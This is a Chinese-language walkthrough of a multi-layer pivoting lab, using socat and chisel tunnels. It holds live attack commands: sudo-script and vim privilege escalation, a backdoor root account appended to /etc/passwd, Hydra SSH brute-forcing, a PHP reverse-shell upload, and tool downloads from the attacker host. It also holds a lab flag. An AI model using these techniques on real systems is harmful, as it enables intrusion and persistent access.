Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(freddy㉿e1a741f99a71)-[~]
└─$ ls -al
total 52
drwxr-xr-x 1 freddy freddy  4096 Mar 29  2024 .
drwxr-xr-x 1 root   root    4096 Mar 29  2024 ..
-rw-r--r-- 1 freddy freddy   220 Nov 26  2023 .bash_logout
-rw-r--r-- 1 freddy freddy  5551 Mar 24  2024 .bashrc
-rw-r--r-- 1 freddy freddy  3526 Nov 26  2023 .bashrc.original
drwxr-xr-x 3 freddy freddy  4096 Mar 24  2024 .config
drwxr-xr-x 3 freddy freddy  4096 Mar 24  2024 .java
-rw-r--r-- 1 freddy freddy   807 Nov 26  2023 .profile
-rw-r--r-- 1 freddy freddy 10868 Feb 16  2024 .zshrc
drwxr-xr-x 2 root   root    4096 Mar 29  2024 Desktop

┌──(freddy㉿e1a741f99a71)-[~]
└─$ sudo -l
Matching Defaults entries for freddy on e1a741f99a71:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User freddy may run the following commands on e1a741f99a71:
    (ALL) NOPASSWD: /usr/bin/python3 /opt/maintenance.py

发现该文件隶属于当前用户

尝试利用python执行创建伪终端提权

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ ls -al
total 12
drwxrwxrwx 1 root   root   4096 Mar 29  2024 .
drwxr-xr-x 1 root   root   4096 Feb 18 11:35 ..
-rw-r--r-- 1 freddy freddy   35 Mar 29  2024 maintenance.py

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ cat maintenance.py
print("Server under beta testing")

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ echo "import pty;pty.spawn('/bin/bash')">maintenance.py

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ sudo /usr/bin/python3 /opt/maintenance.py

┌──(root㉿e1a741f99a71)-[/opt]
└─#

我咋感觉提权到root了也没啥用啊，纯纯浪费我时间喂😠

Chisel三层

直接再次内网穿透建立TUN隧道

这个docker中装的是kali，这也太纯净了

ping命令都没有

不知道为啥wget不到我的kali

我利用scp传个busybox

┌──(root㉿e1a741f99a71)-[/tmp]
└─# wget 192.168.60.100/linpeas.sh
--2025-02-18 15:08:54--  http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... failed: Network is unreachable.
❯ scp busybox [email protected]:/tmp
[email protected]'s password:
busybox 

哦哦，我大概懂了

难怪ping不通我kali，他是通过第二层的主机来连接的

┌──(root㉿e1a741f99a71)-[/tmp]
└─# last
freddy   pts/0        20.20.20.2       Tue Feb 18 15:18   still logged in
freddy   pts/0        20.20.20.2       Tue Feb 18 15:09 - 15:18  (00:08)
freddy   pts/0        20.20.20.2       Tue Feb 18 14:53 - 15:09  (00:16)

wtmp begins Tue Feb 18 14:53:37 2025

所以可以在20.20.20.2的主机中监听端口，将流量全部转发到kali中

我尝试利用ligolo在靶机中开TUN虚拟网卡

不过考虑到第二层靶机是在docker中，无法开启

所以利用socat 搭配chisel使用

目前为止我当前终端开了8个窗口了

注意chisel服务器和客户端的版本需要相等

##第二层seller用户主机中，将端口 2222 收到的所有流量发送到kali的1111端口
root@851709aee958:/tmp# wget 192.168.60.100/socat
--2025-02-18 15:32:30--  http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 473256 (462K) [application/octet-stream]
Saving to: 'socat'

socat                    100%[===============================>] 462.16K  --.-KB/s    in 0.009s

2025-02-18 15:32:30 (52.4 MB/s) - 'socat' saved [473256/473256]

root@851709aee958:/tmp# chmod +x socat
root@851709aee958:/tmp# ./socat tcp-l:2222,fork,reuseaddr tcp:192.168.60.100:1111 &
[2] 13650
--------------------------
##第三层freddy用户主机中，客户端模式，将socks转发到2222
❯ scp chisel [email protected]:/tmp
[email protected]'s password:
┌──(freddy㉿e1a741f99a71)-[~]
└─$ sudo /usr/bin/python3 /opt/maintenance.py
┌──(root㉿e1a741f99a71)-[/home/freddy]
└─# cd /tmp/
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./chisel client 20.20.20.2:2222 R:socks&
--------------------------
##kali主机chisel服务器模式
❯ ./chisel server --reverse -p 1111 &
2025/02/19 00:43:54 server: Reverse tunnelling enabled
2025/02/19 00:43:54 server: Fingerprint fMD70hoZaeUeKI+1nPF+qQrsQ6g/e0ZIe5LdaniA9IU=
2025/02/19 00:43:54 server: Listening on http://0.0.0.0:1111
2025/02/19 00:44:08 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

这样就建立socks5链接了

这里我借用别人扫描端口的截图了 我自己这边扫不到80端口 不知道咋解决

扫一下目录

❯ gobuster dir -u http://30.30.30.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404 --proxy socks5:127.0.0.1:1080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://30.30.30.3
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] Proxy:                   socks5:127.0.0.1:1080
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/index.html           (Status: 200) [Size: 10701]
/secret.php           (Status: 200) [Size: 927]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

有个/secret.php

firefox访问一下，记得设置socsk5

拿到一个用户Mario

Hydra爆破

尝试hydra爆破一下

爆半天爆不出来，原来用户名是小写的

拿到密码chocolate

❯ proxychains hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://30.30.30.3 -I -force
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 01:24:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://30.30.30.3:22/

[22][ssh] host: 30.30.30.3   login: mario   password: chocolate
[STATUS] attack finished for 30.30.30.3 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 01:25:06

尝试ssh登录，有vim的sudo权限

看一下本机ip，再次跳板

❯ proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  30.30.30.3:22  ...  OK
The authenticity of host '30.30.30.3 (30.30.30.3)' can't be established.
ED25519 key fingerprint is SHA256:z6uc1wEgwh6GGiDrEIM8ABQT1LGC4CfYAYnV4GXRUVE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '30.30.30.3' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux c5f63887b9e9 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Mar 20 09:54:46 2024 from 192.168.0.21
mario@c5f63887b9e9:~$
mario@c5f63887b9e9:~$ sudo -l
[sudo] password for mario:
Matching Defaults entries for mario on c5f63887b9e9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mario may run the following commands on c5f63887b9e9:
    (ALL) /usr/bin/vim
mario@c5f63887b9e9:~$ hostname -I
30.30.30.3 40.40.40.2

先升级到root看下有没有什么敏感信息

啥也没有，升了个寂寞😅

mario@c5f63887b9e9:~$ sudo vim
[sudo] password for mario:

root@c5f63887b9e9:/home/mario# id
uid=0(root) gid=0(root) groups=0(root)
root@c5f63887b9e9:/home/mario# echo "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash">>/etc/passwd
root@c5f63887b9e9:/home/mario# exit
exit

Press ENTER or type command to continue
mario@c5f63887b9e9:~$ su primary
Password:
root@c5f63887b9e9:/home/mario#
root@c5f63887b9e9:~# ls -al
total 32
drwx------ 1 root root 4096 Feb 19 05:37 .
drwxr-xr-x 1 root root 4096 Feb 18 11:35 ..
-rw------- 1 root root   71 Feb 19 05:37 .bash_history
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x 3 root root 4096 Mar 20  2024 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
-rw------- 1 root root    0 Apr 21  2024 .python_history
drwx------ 2 root root 4096 Mar 20  2024 .ssh
-rw------- 1 root root  599 Feb 19 05:37 .viminfo

Chisel四层

利用scp传一下chisel到第四层mario主机中

传socat到第三层freddy主机中

❯ proxychains scp chisel [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  30.30.30.3:22  ...  OK
[email protected]'s password:
chisel                                                                                         100% 9152KB  16.0MB/s   00:00
❯ scp /var/www/html/socat [email protected]:/tmp
[email protected]'s password:
socat  

这样利用socat将socks流量转发到20.20.20.2

20.20.20.2主机转发流量到kali

##第三层freddy主机执行
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333,reuseaddr&
##第二层seller主机执行
root@851709aee958:/tmp# ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:192.168.60.100:2222,reuseaddr&
##第四层mario主机执行
mario@c5f63887b9e9:/tmp$ ./chisel client 30.30.30.2:3333 R:1234:socks&
[1] 1090
##kali攻击机执行
❯ ./chisel server --reverse -p 2222
2025/02/19 14:04:51 server: Reverse tunnelling enabled
2025/02/19 14:04:51 server: Fingerprint GKuvwsyJYnMuLplBfDZOp732D6fJ8/DlpJLL6y8pH7g=
2025/02/19 14:04:51 server: Listening on http://0.0.0.0:2222
2025/02/19 14:04:53 server: session#1: tun: proxy#R:127.0.0.1:1234=>socks: Listening

修改一下proxychains4配置文件

❯ sudo vim /etc/proxychains4.conf
[sudo] password for Pepster:
socks5  127.0.0.1 1234

简单扫一下端口，不知道是不是这个速率太高了

导致扫不全

我就当只开放了80端口

❯ proxychains rustscan -a 40.40.40.3 2>/dev/null
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 40.40.40.3:80

扫一下目录，拿到一个upload

sss❯ gobuster dir -u http://40.40.40.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404 --proxy socks5://127.0.0.1:1234
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://40.40.40.3
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] Proxy:                   socks5://127.0.0.1:1234
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1361]
/index.html           (Status: 200) [Size: 1361]
/upload.php           (Status: 200) [Size: 1357]
/uploads              (Status: 301) [Size: 310] [--> http://40.40.40.3/uploads/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

firefox访问一下

文件上传漏洞

猜测有文件上传漏洞

我尝试上传了反弹shell，可以解析phar文件

Online - Reverse Shell Generator

复制或者下载保存一下payload

但问题是反弹不过来，利用socat转发端口

先传个socat到30网段的主机上

❯ proxychains scp /var/www/html/socat [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  30.30.30.3:22  ...  OK
[email protected]'s password:
socat                                                                                          100%  366KB   3.0MB/s   00:00

分别转发端口，层层转发最终到kali上

##第二层seller主机执行
root@851709aee958:/tmp# hostname -I
10.10.10.2 20.20.20.2
root@851709aee958:/tmp# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:192.168.60.100:3333,reuseaddr&
[4] 13833
##第三层freddy主机执行
┌──(root㉿e1a741f99a71)-[/tmp]
└─# hostname -I
20.20.20.3 30.30.30.2
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:20.20.20.3:4444,reuseaddr&
[2] 1862
##第四层mario主机执行
mario@c5f63887b9e9:/tmp$ hostname -i
30.30.30.3 40.40.40.2
mario@c5f63887b9e9:/tmp$ ./socat TCP4-LISTEN:1234,fork,reuseaddr TCP4:30.30.30.2:4444,reuseaddr&
[1] 1151

浏览器访问一下/uploads/php-reverse-shell.phar

结果竟然报错，虽然第四层主机中可以弹到shell，不过到第三层就中断了

┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:20.20.20.2:4444
2025/02/19 09:24:21 socat[3585] E fork(): Resource temporarily unavailable

系统资源不支持⁉️

大概是系统资源已经耗尽

看了一下jobs，不得已把之前建立的连接先关了再说

┌──(root㉿e1a741f99a71)-[/tmp]
└─# jobs
[1]+  Running                 ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333 &

┌──(root㉿e1a741f99a71)-[/tmp]
└─# fg
./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333
^C

Chisel五层

我看了一下，好在第四层主机mario有curl，可以直接curl 反弹webshell

kali中监听3333端口

www-data用户有sudo权限

#靶机中执行
mario@c5f63887b9e9:/tmp$ which curl
/usr/bin/curl
mario@c5f63887b9e9:/tmp$ curl http://40.40.40.3/uploads/php-reverse-shell.phar
------------------------
#kali监听端口
❯ pwncat-cs -lp 3333
[17:24:59] Welcome to pwncat 🐈!                                                  __main__.py:164
[17:37:31] received connection from 192.168.60.191:47960                               bind.py:84
[17:37:31] 0.0.0.0:3333: upgrading from /usr/bin/dash to /usr/bin/bash             manager.py:957
[17:37:32] 192.168.60.191:47960: registered new host w/ db                         manager.py:957
(local) pwncat$
(remote) www-data@ca5d6daff89a:/opt$ sudo -l
Matching Defaults entries for www-data on ca5d6daff89a:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on ca5d6daff89a:
    (root) NOPASSWD: /usr/bin/env

不过我就提权到root，提了也没啥用

看下IP，再次端口转发，传socat和chisel上去

(remote) www-data@ca5d6daff89a:/$ cd /tmp/
(remote) www-data@ca5d6daff89a:/tmp$
(local) pwncat$ upload chisel
draining buffers... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━      100.0% • 9.4/9.4 MB • 3.7 MB/s • 0:00:00
(remote) www-data@ca5d6daff89a:/tmp$ chmod +x chisel
(remote) www-data@ca5d6daff89a:/tmp$
(local) pwncat$ upload /var/www/html/socat
./socat ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 375.2/375.2 KB • ? • 0:00:00
[17:43:57] uploaded 375.18KiB in 0.42 seconds                                        upload.py:76
(local) pwncat$
(remote) www-data@ca5d6daff89a:/tmp$ chmod +x socat
(remote) www-data@ca5d6daff89a:/tmp$ hostname -I
40.40.40.3 50.50.50.2

我🌿了 chisel损坏了，传个busbox到mario主机上，开个httpd

第五层的主机wget一下

##第四层mario主机执行
❯ proxychains scp /var/www/html/busybox [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  30.30.30.3:22  ...  OK
[email protected]'s password:
busybox 
❯ proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  30.30.30.3:22  ...  OK
[email protected]'s password:
Linux c5f63887b9e9 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 19 07:39:44 2025 from 30.30.30.2
mario@c5f63887b9e9:~$ cd /tmp/
mario@c5f63887b9e9:/tmp$ ls -al
total 10640
drwxrwxrwt 1 root  root     4096 Feb 19 10:05 .
drwxr-xr-x 1 root  root     4096 Feb 18 11:35 ..
-rw-r--r-- 1 mario mario 1131168 Feb 19 10:05 busybox
-rwxr-xr-x 1 mario mario 9371800 Feb 19 05:41 chisel
-rwxr-xr-x 1 mario mario  375176 Feb 19 07:38 socat
mario@c5f63887b9e9:/tmp$ chmod +x busybox
mario@c5f63887b9e9:/tmp$ ./busybox httpd -f -p 8080
------------------------
##第五层主机
(remote) root@ca5d6daff89a:/tmp# wget 40.40.40.2:8080/chisel
--2025-02-19 11:07:51--  http://40.40.40.2:8080/chisel
Connecting to 40.40.40.2:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M)
Saving to: 'chisel'

chisel                   100%[===============================>]   8.94M  --.-KB/s    in 0.1s

2025-02-19 11:07:51 (92.1 MB/s) - 'chisel' saved [9371800/9371800]

(remote) root@ca5d6daff89a:/tmp# chmod +x chisel

一切都准备就绪了

结果第三层主机奔溃了

系统资源不足

-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash-5.2$ Read from remote host 20.20.20.3: Connection reset by peer
Connection to 20.20.20.3 closed.
client_loop: send disconnect: Broken pipe

我是有点难崩了，不得已重启了一次靶机

前面重新来一遍

发现socat进程已经完成执行（终止），但其父进程没有正确回收它的退出状态

导致虽然进程已经终止，但仍然占用 PID

出现僵尸进程的情况，原因未知，只能重启🌿

至此，尝试了很多遍

---

后续

我看了下后面的流程，基本都不难都是常规套路

所以我直接看WP拿密码，直接读root了

(remote) peter@HappyJump:/home/peter$ su root
Contraseña:
root@HappyJump:/home/peter# cat /root/root.txt
3ac6640322d7d06957d3773fab3b27b7  -

总之，靶机没什么难度，因为工具卡住就不要去浪费时间了，不建议做了